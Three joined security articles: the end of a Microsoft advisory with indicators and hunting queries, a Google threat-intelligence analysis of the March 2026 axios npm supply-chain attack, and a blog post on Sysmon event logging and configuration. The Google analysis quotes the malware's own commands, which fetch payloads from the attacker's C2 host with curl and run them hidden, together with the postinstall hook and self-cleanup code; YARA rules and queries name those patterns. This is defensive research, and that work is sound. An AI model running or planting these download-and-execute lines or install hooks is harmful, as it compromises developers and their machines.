Microsoft Defender for Endpoint network protection and Microsoft Defender SmartScreen block malicious network indicators observed in the attack. | Indicators of compromise | Indicator | Type | Description | Sfrclak[.]com | C2 domain | Resolves to 142.11.206[.]73. Registrar: NameCheap, Inc | 142.11.206[.]73 | C2 IP | Sapphire Sleet C2 IP. Port 8000, HTTP | hxxp://sfrclak[.]com:8000/6202033 | C2 URL | Static path across all variants | %TEMP%\6202033.vbs | Windows VBScript dropper | Created by node setup.js | %TEMP%\6202033.ps1 | Windows PowerShell payload | Downloaded from C2, self-deleting SHA-256: ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c SHA-256: 617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101 | %PROGRAMDATA%\system.bat | File created by PowerShell | SHA-256: f7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cd | C:\ProgramData\wt.exe | Windows LOLBin | Windows Terminal copy, used as PowerShell proxy | /Library/Caches/com.apple.act.mond | macOS binary | SHA-256: 92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a | /tmp/ld.py | Linux loader | SHA-256: fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf | packages.npm.org/product1 | npm identifier (Windows) | Sent as POST body to C2 | packages.npm.org/product0 | npm identifier (macOS) | Sent as POST body to C2 | Hunting queries Microsoft Defender XDR Microsoft Defender XDR customers can run the following [advanced hunting](https://learn.microsoft.com/defender-xdr/advanced-hunting-overview) queries to find related activity in their networks: Installed Node.js packages with malicious versions DeviceTvmSoftwareInventory | where (SoftwareName has "axios" and SoftwareVersion in ("1.14.1.0", "0.30.4.0")) or (SoftwareName has "plain-crypto-js" and SoftwareVersion == "4.2.1.0") | Detect the RAT dropper and subsequent download and execution CloudProcessEvents | where ProcessCurrentWorkingDirectory endswith '/node_modules/plain-crypto-js' and (ProcessCommandLine has_all ('plain-crypto-js','node setup.js')) or ProcessCommandLine has_all ('/tmp/ld.py','sfrclak.com:8000') | Connection to known C2 DeviceNetworkEvents | where Timestamp > ago(2d) | where RemoteUrl contains "sfrclak.com" | where RemotePort == "8000" | Curl execution to download the backdoor DeviceProcessEvents | where Timestamp > ago(2d) | where (FileName =~ "cmd.exe" and ProcessCommandLine has_all ("curl -s -X POST -d", "packages.npm.org", "-w hidden -ep", ".ps1", "& del", ":8000")) or (ProcessCommandLine has_all ("curl", "-d packages.npm.org/", "nohup", ".py", ":8000/", "> /dev/null 2>&1") and ProcessCommandLine contains "python") or (ProcessCommandLine has_all ("curl", "-d packages.npm.org/", "com.apple.act.mond", "http://",":8000/", "&> /dev/null")) | Microsoft Sentinel Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the [Microsoft Sentinel Content Hub](https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy) to have the analytics rule deployed in their Sentinel workspace. The following queries use [Sentinel Advanced Security Information Model (ASIM) functions](https://learn.microsoft.com/azure/sentinel/normalization) to hunt threats across both Microsoft first-party and third-party data sources. ASIM also supports deploying parsers to specific workspaces [from GitHub](https://aka.ms/DeployASIM), using an ARM template or manually. Detect network IP and domain indicators of compromise using ASIM The following query checks IP addresses and domain IOCs across data sources supported by ASIM network session parser. //IP list and domain list- _Im_NetworkSession let lookback = 30d; let ioc_ip_addr = dynamic(['142.11.206.73']); let ioc_domains = dynamic(["http://sfrclak.com:8000", "http://sfrclak.com"]); _Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now()) | where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains) | summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor | Detect Web Sessions IP and domain indicators of compromise using ASIM The following query checks IP addresses, domains, and file hash IOCs across data sources supported by ASIM web session parser. //IP list - _Im_WebSession let lookback = 30d; let ioc_ip_addr = dynamic(['142.11.206.73']); _Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now()) | where DstIpAddr in (ioc_ip_addr) | summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor // Domain list - _Im_WebSession let ioc_domains = dynamic(["http://sfrclak.com:8000", "http://sfrclak.com"]); _Im_WebSession (url_has_any = ioc_domains) | Microsoft Defender for Cloud Possibly compromised packages Microsoft Defender for Cloud customers can use [cloud security explorer](https://learn.microsoft.com/azure/defender-for-cloud/how-to-manage-cloud-security-explorer) to surface possibly compromised software packages. The following screenshot represents a query that searches for container images with the axios or plain-crypto-js node packages. Threat intelligence reports Microsoft Defender XDR customers can use the following [threat analytics](https://learn.microsoft.com/defender-xdr/threat-analytics) reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments: [Activity profile: Mitigating the Axios npm supply chain compromise](https://security.microsoft.com/threatanalytics3/22b71a55-3c2a-4634-856d-0e937a95834b/overview)[Threat profile overview: North Korea state-sponsored activity](https://security.microsoft.com/threatanalytics3/b24de28e-e504-4266-ae56-902d1abed27c/overview?)[Technique profile: Malicious npm lifecycle scripts](https://security.microsoft.com/threatanalytics3/abc7c39c-4ca0-4325-bcbf-18a3bc8fab01/overview)[Actor profile: Sapphire Sleet](https://security.microsoft.com/threatanalytics3/5ab8c4d1-be7d-4ef9-88b0-6e4f8c356f84/overview) Microsoft Security Copilot customers can also use the [Microsoft Security Copilot integration](https://learn.microsoft.com/defender/threat-intelligence/security-copilot-and-defender-threat-intelligence?bc=%2Fsecurity-copilot%2Fbreadcrumb%2Ftoc.json&toc=%2Fsecurity-copilot%2Ftoc.json#turn-on-the-security-copilot-integration-in-defender-ti) in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the [embedded experience](https://learn.microsoft.com/defender/threat-intelligence/using-copilot-threat-intelligence-defender-xdr) in the Microsoft Defender portal to get more information about this threat actor. Microsoft Security Copilot [Microsoft Security Copilot](https://www.microsoft.com/en-us/security/business/ai-machine-learning/microsoft-security-copilot) is [embedded in Microsoft Defender](https://learn.microsoft.com/defender-xdr/security-copilot-in-microsoft-365-defender) and provides security teams with AI-powered capabilities to summarize incidents, analyze files and scripts, summarize identities, use guided responses, and generate device summaries, hunting queries, and incident reports. Customers can also [deploy AI agents](https://learn.microsoft.com/defender-xdr/security-copilot-agents-defender), including the following [Microsoft Security Copilot agents](https://learn.microsoft.com/copilot/security/agents-overview), to perform security tasks efficiently: [Threat Intelligence Briefing agent](https://learn.microsoft.com/defender-xdr/threat-intel-briefing-agent-defender)[Phishing Triage agent](https://learn.microsoft.com/defender-xdr/phishing-triage-agent)[Threat Hunting agent](https://learn.microsoft.com/defender-xdr/advanced-hunting-security-copilot-threat-hunting-agent)[Dynamic Threat Detection agent](https://learn.microsoft.com/defender-xdr/dynamic-threat-detection-agent) Security Copilot is also available as a [standalone experience](https://learn.microsoft.com/en-us/copilot/security/experiences-security-copilot) where customers can perform specific security-related tasks, such as incident investigation, user analysis, and vulnerability impact assessment. In addition, Security Copilot offers [developer scenarios](https://learn.microsoft.com/copilot/security/developer/custom-agent-overview) that allow customers to build, test, publish, and integrate AI agents and plugins to meet unique security needs. Learn more For the latest security research from the Microsoft Threat Intelligence community, check out the [Microsoft Threat Intelligence Blog](https://aka.ms/threatintelblog). To get notified about new publications and to join discussions on social media, follow us on [LinkedIn](https://www.linkedin.com/showcase/microsoft-threat-intelligence), [X (formerly Twitter)](https://x.com/MsftSecIntel), and [Bluesky](https://bsky.app/profile/threatintel.microsoft.com). To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the [Microsoft Threat Intelligence podcast](https://thecyberwire.com/podcasts/microsoft-threat-intelligence).

North Korea-Nexus Threat Actor Compromises Widely Used Axios NPM Package in Supply Chain Attack Google Threat Intelligence Group Mandiant Google Threat Intelligence Visibility and context on the threats that matter most. [Contact Us & Get a Demo](https://cloud.google.com/security/resources/google-threat-intelligence-demo?utm_source=cgc-blog&utm_medium=blog&utm_campaign=FY25-Q2-global-GCP30649-website-su-dgcsm-GTI-interest) Written by: Austin Larsen, Dima Lenz, Adrian Hernandez, Tyler McLellan, Christopher Gardner, Ashley Zaya, Michael Rudden, Mon Liclican Introduction Google Threat Intelligence Group (GTIG) is tracking an active software supply chain attack targeting the popular Node Package Manager (NPM) package "[axios](https://www.npmjs.com/package/axios)." Between March 31, 2026, 00:21 and 03:20 UTC, an attacker introduced a malicious dependency named "plain-crypto-js " into axios NPM releases versions 1.14.1 and 0.30.4. Axios is the most popular JavaScript library used to simplify HTTP requests, and these packages typically have over 100 million and 83 million weekly downloads, respectively. This malicious dependency is an obfuscated dropper that deploys the WAVESHAPER.V2 backdoor across Windows, macOS, and Linux. GTIG attributes this activity to [UNC1069](https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering), a financially motivated North Korea-nexus threat actor active since at least 2018, based on the use of WAVESHAPER.V2, an updated version of [WAVESHAPER](https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering) previously used by this threat actor. Further, analysis of infrastructure artifacts used in this attack shows overlaps with infrastructure used by UNC1069 in past activities. This blog details the attack lifecycle, from the initial account compromise to the deployment of operating system (OS)-specific payloads, and provides actionable guidance for defenders to identify and mitigate this threat. Campaign Overview On March 31, 2026, GTIG observed the introduction of plain-crypto-js version 4.2.1 as a dependency in the legitimate axios package version 1.14.1. Analysis indicates the maintainer account associated with the axios package was compromised, with the associated email address changed to an attacker-controlled account (ifstap@proton.me ). The threat actor used the postinstall hook within the "package.json" file of the malicious dependency to achieve silent execution. Upon installation of the compromised axios package, NPM automatically executes an obfuscated JavaScript dropper named "setup.js" in the background. "scripts": { "test": "echo \"Error: no test specified\" && exit 1", "postinstall": "node setup.js" } Malware Analysis The plain-crypto-js package serves as a payload delivery vehicle. The core component, SILKBELL, setup.js (SHA256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09 ), dynamically checks the target system's operating system upon execution to deliver platform-specific payloads. The script uses a custom XOR and Base64-based string obfuscation routine to conceal the command-and-control (C2 or C&C) URL and host OS execution commands. To evade static analysis, it dynamically loads fs , os , and execSync . After successfully dropping the secondary payload, setup.js attempts to delete itself and revert the modified package.json to hide forensic traces of the postinstall hook. Operating System-Specific Execution Paths Depending on the identified platform, the dropper executes the following routines. Windows The dropper actively hunts for the native powershell.exe binary. To evade detection, it copies the legitimate executable to %PROGRAMDATA%\wt.exe . It then downloads a PowerShell script via curl using the POST body packages.npm.org/product1 and saves it to the user's AppData Temp directory (e.g., %TEMP%\6202033.ps1 ). The payload is executed using a copied Windows Terminal executable with hidden and execution policy bypass flags. Set objShell = CreateObject("WScript.Shell") objShell.Run "cmd.exe /c curl -s -X POST -d packages.npm.org/product1 http://sfrclak[.]com:8000/6202033 > %TEMP%\6202033.ps1 & %PROGRAMDATA%\wt.exe -w hidden -ep bypass -file %TEMP%\6202033.ps1 http://sfrclak[.]com:8000/6202033 & del ""PS_PATH"" /f", 0, False macOS The malware uses bash and curl to download a native Mach-O binary payload to /Library/Caches/com.apple.act.mond using the POST body packages.npm.org/product0 . It modifies permissions to make the file executable and launches it via zsh in the background. try do shell script " curl -o /Library/Caches/com.apple.act.mond -d packages.npm.org/product0 -s http://sfrclak.com:8000/6202033 && chmod 770 /Library/Caches/com.apple.act.mond && /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &" &> /dev/null" " end try do shell script "rm -rf tmp/6202033" Linux The script downloads a Python backdoor to /tmp/ld.py using the POST body packages.npm.org/product2 . Cleanup Aside from removing downloaded scripts in two execution branches, the script attempts to remove itself and replace an injected package.json with an original one, which was stored as "package.md ". const K = __filename; t.unlink(K, (x => {})) t.unlink('package.json', (x => {})), t.rename('package.md', 'package.json', ord) WAVESHAPER.V2 Backdoor Capabilities The platform-specific payloads ultimately deploy variants of a backdoor tracked by GTIG as WAVESHAPER.V2, a backdoor written in C++ that targets macOS to collect system information, enumerate directories, or execute additional payloads and that connects to the C2 provided via command-line arguments. Notably, GTIG identified additional variants of WAVESHAPER.V2 written in PowerShell and Python to target diverse environments. Regardless of the operating system, the malware beacons to the C2 endpoint over port 8000 at 60-second intervals. The beacon consists of Base64-encoded JSON data and uses a hard-coded User-Agent: mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0) Following the initial beaconing to the adversary infrastructure, WAVESHAPER.V2 continuously polls, pausing for 60 seconds awaiting instructions. The server response determines the next action taken by the implant. The backdoor supports multiple commands outlined in the Table 1. On Windows, persistence is achieved by creating a hidden batch file (%PROGRAMDATA%\system.bat ) and adding a new entry named MicrosoftUpdate to HKCU:\Software\Microsoft\Windows\CurrentVersion\Run to launch it at logon. WAVESHAPER.V2 acts as a fully functional RAT with the following capabilities: - Reconnaissance: Extracts system telemetry, including hostname, username, boot time, time zone, OS version, and detailed running process lists. - Command Execution: Supports multiple execution methods, including in-memory Portable Executable (PE) injection and arbitrary shell commands. The shell execution command expects a script and script parameters from C2; if no script is provided, the parameter is executed as a PowerShell command, but if a script is provided, it is either Base64-encoded or placed into a file depending on its size. - File System Enumeration: Returns detailed metadata for requested target directories by continuously recursing through the file system. Attribution GTIG attributes this activity to [UNC1069](https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering), a financially motivated North Korea-nexus threat actor active since 2018. Analysis of the C2 infrastructure (sfrclak[.]com resolving to 142.11.206.73 ) revealed connections from a specific AstrillVPN node previously used by UNC1069. Additionally, adjacent infrastructure hosted on the same ASN has been historically linked to UNC1069 operations. Furthermore, WAVESHAPER.V2 is a direct evolution of [WAVESHAPER](https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering), a macOS and Linux backdoor previously attributed to UNC1069. While the original WAVESHAPER uses a lightweight, raw binary C2 protocol and employs code packing, WAVESHAPER.V2 communicates using JSON, collects additional system information, and supports more backdoor commands. Despite these upgrades, both versions accept their C2 URL dynamically via command-line arguments, share identical C2 polling behaviors and an uncommon User-Agent string, and deploy secondary payloads to identical temporary directories (e.g., /Library/Caches/com.apple.act.mond ). Outlook and Implications The impact of this attack by North Korea-nexus actors is broad and has ripple effects as other popular packages rely on axios as a dependency. Notably, UNC1069 isn’t the only threat actor that has launched successful open source supply chain attacks in recent weeks. UNC6780 (also known as TeamPCP) recently poisoned GitHub Actions and PyPI packages associated with projects like Trivy, Checkmarx, and LiteLLM to deploy the SANDCLOCK credential stealer and facilitate follow-on extortion operations. Hundreds of thousands of stolen secrets could potentially be circulating as a result of these recent attacks. This could enable further software supply chain attacks, software as a service (SaaS) environment compromises (leading to downstream customer compromises), ransomware and extortion events, and cryptocurrency theft over the near term. Supply chain compromise is a particularly dangerous tactic because it abuses the inherent trust that users and enterprise administrators place in hardware, software, and updates supplied by reputable vendors as well as the trust they may not realize they are placing in collaborative code-sharing communities. Defenders should pay close attention to these campaigns, and enterprises should initiate dedicated efforts to assess the existing impact, remediate compromised systems, and harden environments against future attacks. Remediation GTIG urges all developers and organizations using the axios package to take immediate corrective action. Priority should be given to auditing dependency trees for compromised versions, isolating affected hosts, and rotating any potentially exposed secrets or credentials. Following initial containment, organizations must implement long-term hardening through strict version pinning and enhanced supply-chain monitoring. - Version Control: Do not upgrade to axios version 1.14.1 or 0.30.4. Ensure corporate-managed NPM repositories are configured to serve only known-good versions (e.g., 1.14.0 or earlier; 0.30.3 or earlier). - Dependency Pinning: Pin axios to a known safe version in your package-lock.json to prevent accidental upgrades. - Malicious Package Audit: Inspect project lockfiles specifically for the 'plain-crypto-js' package (versions 4.2.0 or 4.2.1). Use tools like [Wiz](https://wiz.io)or[Open Source Insights](https://deps.dev/)for deeper dependency auditing. - Pipeline Security: Pause CI/CD deployments for any package relying on axios. Validate that builds are not pulling "latest" versions before redeploying with pinned, safe versions. - Incident Response: If plain-crypto-js is detected, assume the host environment is compromised. Revert the environment to a known-good state and rotate all credentials or secrets present on that machine. - Network Defense: Block all traffic to sfrclak[.]com and the command & control IP: 142.11.206.73. Monitor and alert on any endpoint communication attempts to this domain. - Cache Remediation: Clear local and shared npm, yarn, and pnpm caches on all workstations and build servers to prevent re-infection during subsequent installs. - Endpoint Protection: Deploy EDR to protect developer environments. Monitor for suspicious processes spawning from Node.js applications that match known Indicators of Compromise (IOCs). - Credential Management: Rotate all tokens and API keys used by applications confirmed to have run indicators of compromise (IOCs). - Developer Sandboxing & Secret Vaulting: Isolate development environments in containers or sandboxes to restrict host filesystem access, and migrate plaintext secrets to the OS keychain using [aws-vault](https://github.com/ByteNess/aws-vault?tab=readme-ov-file). This ensures compromised packages cannot programmatically scrape credentials or execute malicious scripts directly on the host machine. Indicators of Compromise (IOCs) To assist the wider community in hunting and identifying the activity outlined in this blog post, we have included IOCs in a free [GTI Collection](https://www.virustotal.com/gui/collection/c5adea0fa8aac14e6aabd8d3d4a1d19e4cd0eb76e679f2e9d3fed2a3170c09bb/summary) for registered users. Network Indicators File Indicators YARA Rules These rules may be most useful on developer workstations, CI/build systems, and other suspected impacted hosts for retrospective hunting and validation. rule G_Backdoor_WAVESHAPER.V2_PS_1 { meta: description = "Detects the WAVESHAPER.V2 PowerShell backdoor which communicates with C2 via base64 encoded JSON beacons and supports PE injection and script execution" author = "GTIG" md5 = "04e3073b3cd5c5bfcde6f575ecf6e8c1" date_created = "2026/03/31" date_modified = "2026/03/31" rev = 1 platforms = "Windows" family = "WAVESHAPER.V2" strings: $ss1 = "packages.npm.org/product1" ascii wide nocase $ss2 = "Extension.SubRoutine" ascii wide nocase $ss3 = "rsp_peinject" ascii wide nocase $ss4 = "rsp_runscript" ascii wide nocase $ss5 = "rsp_rundir" ascii wide nocase $ss6 = "Init-Dir-Info" ascii wide nocase $ss7 = "Do-Action-Ijt" ascii wide nocase $ss8 = "Do-Action-Scpt" ascii wide nocase condition: uint16(0) != 0x5A4D and filesize < 100KB and 5 of ($ss*) } rule G_Hunting_Downloader_suspected_UNC1069_PS_1 { meta: description = "Detects PowerShell dropper associated with suspected UNC1069 and Axios npm package supply chain attack. Associated to WAVESHAPER.V2" author = "GTIG" md5 = "089e2872016f75a5223b5e02c184dfec" date_created = "2026/03/31" date_modified = "2026/03/31" rev = 1 platforms = "Windows" strings: $ss1 = "start /min powershell -w h" ascii wide nocase $ss2 = "[scriptblock]::Create([System.Text.Encoding]::UTF8.GetString" ascii wide nocase $ss3 = "Invoke-WebRequest -UseBasicParsing" ascii wide nocase $ss4 = "-Method POST -Body" ascii wide nocase $ss5 = "packages.npm.org/product1" ascii wide nocase condition: uint16(0) != 0x5A4D and filesize < 5KB and all of them } rule G_Hunting_Downloader_SILKBELL_1 { meta: description = "Detects the obfuscated version of the JS NPM supply chain downloader using Base64 obfuscation and custom XOR. Associated with WAVESHAPER.V2" author = "GTIG" md5 = "7658962ae060a222c0058cd4e979bfa1" date_created = "2026/03/31" date_modified = "2026/03/31" rev = 1 platforms = "Any" strings: $ss1 = "OrDeR_7077" ascii wide fullword $ss2 = "String.fromCharCode(S^a^333)" ascii wide $ss3 = "\"TE9DQUw^\".replaceAll(\"^\",\"=\")" ascii wide $ss4 = "\"UFM_\".replaceAll(\"_\",\"=\")" ascii wide $ss5 = "\"U0NSXw--\".replaceAll(\"-\",\"=\")" ascii wide $ss6 = "\"UFNfQg--\".replaceAll(\"-\",\"=\")" ascii wide $ss7 = "\"d2hlcmUgcG93ZXJzaGVsbA((\".replaceAll(\"(\",\"=\")" ascii wide condition: uint16(0) != 0x5A4D and filesize < 100KB and all of them } Google Security Operations (SecOps) Google Security Operations (SecOps) customers have access to the following broad category rules and more under the Mandiant Intel Emerging Threats rule pack. - Curl Writing Apple System File to Staging Directory - Node Spawning Nohup Osascript - Node Spawning Windows Script Host With Delete Command - Windows Script Host Spawning Shell With Curl - Windows Terminal In Suspicious Staging Directory Wiz Wiz customers should check their Wiz Threat Center for information on this advisory and whether or not they are impacted. For more information refer to Wiz’s blog post, [Axios NPM Distribution Compromised in Supply Chain Attack](https://www.wiz.io/blog/axios-npm-compromised-in-supply-chain-attack).

Building a Detection Foundation: Part 4 - Sysmon Table of contents Filling the Gaps Native Logging Can't At this point in our series, we have Windows Security events capturing logon sessions and process creation, and PowerShell logging capturing script execution. That's a solid foundation. But if you've worked Incident Response, you've hit the walls of native logging: - "We know PowerShell ran, but what did it connect to?" - "Something modified this registry key, but we don't know which process." - "A malicious DLL was loaded—when? By what?" This is where Sysmon enters the picture. Sysmon, a free Windows system service and driver from Microsoft [Sysinternals](https://learn.microsoft.com/en-us/sysinternals/) that monitors and logs system activity to the Windows event log, is soon to be included in the latest versions of Windows Server and Windows 11. It's not a replacement for native logging—it's a complement that provides telemetry Windows simply doesn't offer natively. I do have a small bias since I have been writing about the tool since it came out, given multiple training classes on it, and wrote most of the [Sysmon Community Guide](https://github.com/trustedsec/SysmonCommunityGuide), but I do see where it falls short and will do my best to cover some of the basics. Do check the [resources](#Resources) at the end of this blog to go deeper on how to leverage the tool. What Sysmon Provides Looking back at our [MITRE ATT&CK](https://attack.mitre.org/) data source coverage, here's where Sysmon fills critical gaps: Data Component | Technique Coverage | Sysmon Event | |---|---|---| Process Creation | 452 | Event 1 (enhanced parent info, hashes) | Network Connection Creation | 151 | Event 3 | Module Load | 109 | Event 7 | Windows Registry Key Modification | 86 | Events 12, 13, 14 | Process Access | 77 | Event 10 | File Creation | 174 | Event 11 | Driver Load | 14 | Event 6 | WMI Operations | 7 | Events 19, 20, 21 | Named Pipe | 4 | Events 17, 18 | DNS Queries | — | Event 22 | Let me walk through the Sysmon events you should care about and why. Essential Sysmon Events Event 1: Process Creation Yes, we have Event ID 4688 from native logging. So why use Sysmon Event 1? What Sysmon adds: - File hashes (MD5, SHA1, SHA256) of the executable - More reliable parent process information - Parent command line - Integrity level - More consistent formatting Detection value: - Hash lookups for known-bad binaries - Detecting renamed legitimate tools (hash matches, name doesn't) - Process tree reconstruction Event 3: Network Connection This is huge. Native Windows logging does not provide a reliable way to track which process connected to which IP address. Sysmon Event 3 captures: - Source IP address and port - Destination IP address and port - Protocol - The process that initiated the connection - User context Why this matters: You see PowerShell execute. It runs a download cradle. Event 3 shows you powershell.exe connected to 192.168.1.100:443. Now you have an IOC to hunt for across other systems and network logs. What to prioritize: When configuring Event 3, I recommend focusing on two categories: 1. C2 Channels: Ports commonly used for C2 traffic - SSH (22) - Often used for encrypted C2 - HTTP (80) and HTTPS (443) - The most common C2 channels - DNS (53) - DNS tunneling and C2 over DNS 2. Lateral Movement/Remote Management: Ports that indicate system-to-system access - RDP (3389) - WinRM (5985, 5986) - SSH (22) - SMB (445) - Telnet (23) - Common Remote Monitoring and Management (RMM) tools (varies by vendor—ScreenConnect, AnyDesk, TeamViewer, etc.) The HTTPS exclusion problem: Here's a challenge: every software vendor wants telemetry these days. Your environment is full of legitimate HTTPS traffic from browsers, update services, security tools, and business applications. If you log all port 443 traffic, you'll drown in noise. The solution is compound exclusion rules. Don't exclude based on a single field—attackers can rename their tools. Instead, build exclusions that require multiple conditions to match: - Image (full path) AND ParentImage (full path) - Or Image AND User context For example, don't just exclude chrome.exe. Exclude C:\Program Files\Google\Chrome\Application\chrome.exe when the parent is C:\Program Files\Google\Chrome\Application\chrome.exe (Chrome spawns child processes). An attacker who names their beacon chrome.exe and drops it in C:\Users\Public\ won't match your exclusion. This approach takes more effort upfront but dramatically reduces your exposure to simple evasion techniques. Event 6: Driver Load Attackers load malicious drivers for kernel-level access, rootkit functionality, or to disable security tools. Event 6 captures: - Driver path - Hash - Signature status Why this matters: Recall the vulnerable driver attacks used to blind EDR? Event 6 would show that driver loading, giving you a fighting chance to detect it. Event 7: Image Load (DLL) This logs when a module (DLL) is loaded into a process and is critical for detecting: - DLL hijacking - Side-loading attacks - Reflective DLL injection (in some cases) Configuration consideration: This event is noisy. You'll want to filter aggressively—focus on non-standard paths, unsigned DLLs, specific DLLs that are known to provide attackers capabilities they need, and specific high-risk processes. Event 10: Process Access This fires when a process opens a handle to another process. This is your primary indicator for credential extraction techniques that access LSASS. Why this matters: Mimikatz and similar tools need to open a handle to lsass.exe with specific access rights. Event 10 captures this. What to watch for: - Any process accessing LSASS with access mask 0x1010 (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION) - Pay special attention to access masks 0x1F1FFF or0x1FFFFF as these are the highest permission level and mean the memory is being extracted for the process. - Non-standard processes accessing LSASS at all Event 11: File Create Look at log file creation events. Combined with the process context, you know not just that a file was created but what created it. Why this matters: Malware drops payloads. Event 11 shows powershell.exe created C:\Users\Public\payload.exe. You now have the full chain. By monitoring all executable file types and critical OS locations, you can detect: • Malware dropping executables in system directories (C:\Windows\System32, C:\Windows\SysWOW64) • Persistence mechanisms placing files in startup folders • Driver/kernel module installations in \Windows\System32\drivers\ • DLL hijacking attempts in system directories • Scripts being staged in temp directories • Suspicious file creation in protected Windows folders • Executable files created in public/shared locations that shouldn't contain them The comprehensive file type coverage ensures you catch all executable formats Windows supports, not just .exe files. Monitoring critical OS paths catches attackers attempting to blend in with legitimate system files or establish deep persistence. For additional file creation rules and examples to consider for your environment, see the [Sysmon Modular project's File Create section here](https://github.com/olafhartong/sysmon-modular/tree/master/11_file_create). Events 12, 13, 14: Registry Operations - Event 12: Registry object added or deleted - Event 13: Registry value set - Event 14: Registry object renamed Why this matters: Registry persistence mechanisms (Run keys, services, COM hijacking) are everywhere in attacker tradecraft. Native Windows auditing can capture registry access, but it requires complex SACL configuration. Sysmon makes it straightforward. Events 17, 18: Pipe Created / Pipe Connected Why this matters: Certain pipe names are strong indicators of malicious activity, but here's the catch: attackers can (and do) randomize their pipe names. Targeting known-bad patterns will catch commodity tooling, but sophisticated actors will slip through. The better approach: Rather than trying to enumerate all possible malicious pipe names, I recommend building a baseline of valid named pipes in your environment and then creating exclusions for those. Log everything else. This way, any new or unusual pipe that appears gets captured—and you handle the alerting logic at your SIEM where you have more flexibility. We cover both strategies in depth in the [TrustedSec Sysmon Community Guide](https://github.com/trustedsec/SysmonCommunityGuide/blob/master/chapters/named-pipes.md)—the targeted approach and the exclusion-based approach. I personally prefer the exclusion method with detection happening at the SIEM layer. Events 19, 20, 21: WMI Events - Event 19: WmiEventFilter activity - Event 20: WmiEventConsumer activity - Event 21: WmiEventConsumerToFilter activity Why this matters: WMI event subscriptions are a stealthy persistence mechanism. These events let you see them being created. Paired with Microsoft-WMI-Activity/Operational Event ID 5858 that logs WMI errors, Event ID 5857 for providers loaded, and Event ID 5861 for permanent events, you have full redundancy in coverage. Event 22: DNS Query This logs DNS queries with the process that made them and is critical for detecting C2 communication, DNS tunneling, and domain generation algorithms. Why this matters: You see powershell.exe queried evil-domain.com. Your network logs might show the DNS traffic, but without Sysmon you wouldn't know which process initiated it. The better approach: I will be honest. This one in client machines is painful to get a good signal-to-noise ratio (SNR), and I prefer network management platforms. On servers where there is more control, less applications loading multiple websites, and new entries on a constant basis, it is of great value however. Use it if another solution is not available, but be aware on what role the host plays before implementing it. A Practical Sysmon Configuration Below is a production-ready Sysmon configuration that balances visibility with performance. This isn't a one-size-fits-all solution, aka you should tune it for your environment, but it's a strong starting point. This configuration can be copied to an XML document and applied using the Sysmon.exe process on a test system. Once tuned, you can deploy the registry value using GPO or Intune, depending on your environment. I would recommend the [Learning Sysmon video series](https://www.youtube.com/playlist?list=PLk-dPXV5k8SG26OTeiiF3EIEoK4ignai7) I recorded if you are not familiar on how to do this. I go over each event type and recommendations for each. md5,sha256,IMPHASH False C:\Windows\System32\backgroundTaskHost.exe C:\Windows\System32\RuntimeBroker.exe C:\Windows\System32\taskhostw.exe C:\Windows\System32\svchost.exe 443 80 53 22 3389 5985 5986 445 23 135 8040 7070 5938 \powershell.exe \cmd. exe \wscript.exe \cscript.exe \mshta.exe \rundll32.exe \regsvr32.exe \certutil.exe \bitsadmin.exe false \Users\ \Temp\ \AppData\ \Downloads\ false C:\Windows\System32\svchost.exe C:\Windows\explorer.exe C:\Windows\System32\lsass.exe C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\System32\svchost.exe C:\Windows\System32\lsass.exe \Microsoft\Windows Defender\ .exe .dll .sys .drv .ocx .cpl .scr .com .pif .ps1 .psm1 .psd1 .bat .cmd .vbs .vbe .js .jse .wsf .wsh .hta .msi .msp .lnk .url .inf .reg C:\Windows\System32\ C:\Windows\SysWOW64\ C:\Windows\ \Windows\System32\drivers\ \Windows\System32\config\ \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ \AppData\Local\Temp\ \Users\Public\ \ProgramData\ \Temp\ \Windows\Temp\ \Downloads\ \Desktop\ \$Recycle.Bin\ \CurrentVersion\Run \Services\ \Classes\CLSID\ \Image File Execution Options\ \Windows\AppInit_DLLs \Winlogon\ \Lsa\ \lsass \ntsvcs \scerpc \wkssvc \srvsvc \winreg \spoolss \netlogon \samr \browser Created powershell cmd. exe wscript cscript rundll32 regsvr32 .microsoft.com .windows.com .windowsupdate.com Deploying Sysmon Installation Download Sysmon from the official [Sysinternals page](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon). Install with configuration: I recommend you copy the configuration shown above into an XML document and apply it. sysmon64.exe -accepteula -i sysmon-config.xml Update existing configuration: After tunning the configuration to your liking, you can apply the tuned config to a system using scripts, GPO, or Intune. The command below will apply the updated config. 